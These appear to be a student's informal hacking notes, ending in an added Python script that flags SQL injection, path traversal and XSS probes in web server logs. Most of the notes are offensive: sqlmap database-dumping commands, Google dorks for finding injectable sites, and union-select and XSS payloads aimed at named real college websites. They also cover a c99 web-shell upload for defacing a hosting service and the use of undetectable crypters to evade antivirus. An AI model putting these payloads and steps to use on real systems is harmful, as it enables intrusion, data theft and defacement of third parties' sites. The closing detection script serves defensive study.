
NOTE: thisislegal.com for tuts


NOTE: kfsensor: honeypot
NOTE: Snort: IDS
cd /pentest/database/sqlmap
./sqlmap.py -u <path of website with .php?id=156'>
(-u specifies the target URL)
./sqlmap.py -u <path of website with .php?id=156'> --dbs

NOTE: inurl:php?=site:<website name ex: edu.in or xyz.com>


NOTE: add .php?id=156%27 after a website name.
./sqlmap.py -u <path of website with .php?id=156'> -D <database> --tables
./sqlmap.py -u <path of website with .php?id=156'> -D <database> -T <tablename> --columns
./sqlmap.py -u <path of website with .php?id=156'> -D <database> -T <tablename> -C <column name1,column name2,...> --dump
1) Adding text to the end of the URL
www.website.com/admin
www.website.com/administrator
www.website.com/login
www.website.com/wp-login.php : only for WordPress
www.website.com/admin.php
2) Exploit the robots.txt

www.website.com/robots.txt
3) Google dorks searching

site:website.com login (you can change the keyword to admin, administrator or something similar)
site:website.com inurl:login (same implies here)
site:website.com intitle: admin login (same implies here with the keywords)
ex: edu inurl:login
4) Using the Yashar shahinzadeh admin page finder
http://y-shahinzadeh.ir/af
5) Using the Havij Tool

SARANG's ECSA:
1) Explore source code for files and directory paths, comments, etc.
2) Use robots.txt for exploring directory listing.

Check SQL injection vulnerability:


<url>' : URL with a single quote appended
<url>.php?mode=28&id=28 (keep manipulating this value, positive and negative)
sql injection cheat sheet
enigmagroup.org
NOTE: google dork: inurl:.php?id= site:moderncoe.edu.in
ex: http://moderncoe.edu.in/library-page.php?page=1
http://moderncoe.edu.in/research.php?id=156 order by 1-- (no error shows at least one row is there in the connected database)
http://moderncoe.edu.in/research.php?id=156 order by 2-- (no error shows at least one row is there in the connected database)
NOTE: use login finder tool to find admin login page of a url
NOTE: watch video sqli defacement part 1 and 2
keep doing till error comes.
Then
http://moderncoe.edu.in/research.php?id=156 union all select 1,2,3......-- (total number of columns that did not show an error; note the -- after the query, -- means comment)
NOTE: OWASP MANTRA(web app vul test browser)
NOTE: angry ip scanner
Add features: all of them for all results.
Preferences: display in results: alive hosts
ex IP address range: 162.222.225.1-.254 /24
Right click on an entry-> OPEN->....
ex: web browser of http://162.222.225.33/
view source code and observe
plugins/pwpassword/pwpassword.js for forgot password.
Javascript 001 Intercept http data...
firefox: install firebug
Inspect "login" button using firebug, and modify the sent value for a given display value:
Display value: Jack;
Sent value: Jane
Javascript 002:
Enter wrong password:
Right click on try again and inspect in firebug.
Now click try again to view run time script.
Password is there in the "if" condition : skriptkid
javascript003: script is hidden. Hence explore HTML <body>
for password. Sauc3
javascript 004: same as 002
javascript 005: Password is given in HEX. Use asciitohex.com to get the ASCII password

javascript 006: same as above...


javascript 007: J_o_i_n_s_I_t
http://cryptocult.wordpress.com/cyber-challenges/enigma-group-solutions/javascript-exploits/
samair.ru/proxy/ : anonymous proxy ip.
http://hidemyass.com/proxy-list/
Tamper Data addon for live runtime HTTP header modification on the fly
hi' or 1=1-- : fake password....
http://cryptocult.wordpress.com/cyber-challenges/enigma-group-solutions/sql-injection/
IJKRhjwB_212vfUKyhnHe8k0
password decrypt using
md5 decoder
base64(contains =)
crack station
http://www.md5decrypter.co.uk/
NOTE: exploitdatabase
jboss server hacks : use /status after url
zenmap: net scan
OWASP DirBuster: scans all folders associated with a website
my3gb.com:
<url>/user_index.jsp
ex: ftp://ftp.hq.nasa.gov/ : ftp download of nasa

use c99 shell for website defacement.


1) register on my3gb.com and login
2) file manager : upload a sample image file
3) also upload c99.php. If not allowed, upload using jpeg binder
4) click on the c99.php and get the file url.
5) logout.
6) go to the file url in step 4
7) even though you are logged out, you can access the root of the server. Check by deleting a jpeg file. Note, we are logged out.
8) can also add files.
9) relogin and check the changes are reflecting

search for hacks by p777i


search for fud crypter: fully undetectable
check your hack with online antivirus (total antivirus)
audit discovery 1
http://www.enigmagroup.org/missions/basics/auditing/1/index.php/%22%3E%3Cscript%3Ealert%28%271%27%29%3C/script%3E
>"<script>alert(1)</script>

https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
audit discovery 4
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../../../../../google.com
(LFI works but RFI does not)
http://www.enigmagroup.org/missions/basics/auditing/4/?page=../../../../../../../../../../http://google.com
audit disc 5
http://www.enigmagroup.org/missions/basics/auditing/5/?file=config.php
audit discovery 6: see command injection in url
realistic 1:
nmap reveals it is Linux based, as it uses 8080: Apache server.
hence:
http://www.enigmagroup.org/missions/realistics/1/?page=../../../../../../../../../../../../../../../etc/passwd
buffer overflow to reveal passwd file.
http://www.enigmagroup.org:1337/ as nmap reveals it is a waste port.. may be customized for login so exploit it.
use john the ripper to reveal passwords.

Monday: OWASP top 10 vuls.


maltego, hyena
the dude, lan surveyor
webgoat : web application framework simulation
acunetix, nessus

webgoat insecure login example:


(check bankgaborone.co.bw : view page source code, go to href, find fileadmin... and then go to bankgaborone.co.bw/fileadmin or similar dirs)
bothocollege: inspect element "forgot password" using firefox: reveals form_user
also use Burp Suite to intercept (enable proxy in firefox using owasp tools -> fire proxy)
modern college
BeEF: web vuln exploit

DOM(Document Object model) based XSS vul : DOM xss scanner online tool
Xss vul ex.
Instead of
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=Prayatna
write this:
http://scmhrd.edu/eventgallery.php?eventyear=2013&eventname=<script>alert("Hello")</script>
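Every probe these notes walk through (the appended quote, the order by / union select column-count trick, the ../ traversal in the auditing missions, and the <script> payload in the gallery URL) leaves a recognisable trace in the web server's access log. The script below is an added example for the defending side and is not part of the original notes: it parses constructed Apache combined-format log lines (hosts, addresses and paths are invented for the example) and flags the parameter values that match those patterns, so a practitioner can see what a detection rule for this class of activity looks like and count which client produced it.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format access log. Addresses, paths and
# timestamps are made up for this example and do not refer to any real site.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /research.php?id=156 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /research.php?id=156%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "GET /research.php?id=156%20order%20by%203-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:12:00:04 +0000] "GET /research.php?id=156%20union%20all%20select%201,2,3-- HTTP/1.1" 200 5300 "-" "sqlmap/1.0"
10.0.0.7 - - [10/Mar/2024:12:01:00 +0000] "GET /view/?page=../../../../etc/passwd HTTP/1.1" 200 1024 "-" "curl/8.0"
10.0.0.8 - - [10/Mar/2024:12:02:00 +0000] "GET /eventgallery.php?eventyear=2013&eventname=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:03:00 +0000] "GET /eventgallery.php?eventyear=2013&eventname=Prayatna HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Each rule is applied to one percent-decoded query-parameter value.
# Rule names are chosen for this example, not taken from any product.
PARAM_RULES = [
    ("sqli_quote", re.compile(r"^\d+'|'\s*(or|and)\s+|'\s*--", re.I)),
    ("sqli_order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("sqli_union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("path_traversal", re.compile(r"(\.\./){2,}")),
    ("xss_script_tag", re.compile(r"<\s*script\b", re.I)),
]
# Applied to the User-Agent of the whole request (sqlmap announces itself by default).
UA_RULE = ("scanner_user_agent", re.compile(r"\bsqlmap\b", re.I))


def analyze_line(line):
    """Return the list of findings for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    findings = []
    query = urlsplit(m["target"]).query
    # parse_qsl percent-decodes, so id=156%27 is inspected as the string 156'
    for name, value in parse_qsl(query, keep_blank_values=True):
        for rule, pattern in PARAM_RULES:
            if pattern.search(value):
                findings.append({"ip": m["ip"], "rule": rule, "param": name,
                                 "status": int(m["status"]), "ua": m["ua"]})
    if UA_RULE[1].search(m["ua"]):
        findings.append({"ip": m["ip"], "rule": UA_RULE[0], "param": None,
                         "status": int(m["status"]), "ua": m["ua"]})
    return findings


def scan_log(text):
    """Run analyze_line over every non-empty line and concatenate the findings."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        found = analyze_line(line)
        if found:
            out.extend(found)
    return out


def count_by_ip(findings):
    """How many flagged requests each client address produced."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]:<10} {h["rule"]:<20} param={h["param"]} status={h["status"]}')
    print("per source:", count_by_ip(hits))
```

Checking decoded parameter values rather than the raw request line is the design choice that matters: the probes in the notes arrive percent-encoded (id=156%27, %3Cscript%3E), and a rule matching only the literal characters would miss them. A repeated 500 from the same address on the same parameter, as in the constructed quote and order-by lines, is the signal worth alerting on even before a union select appears.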
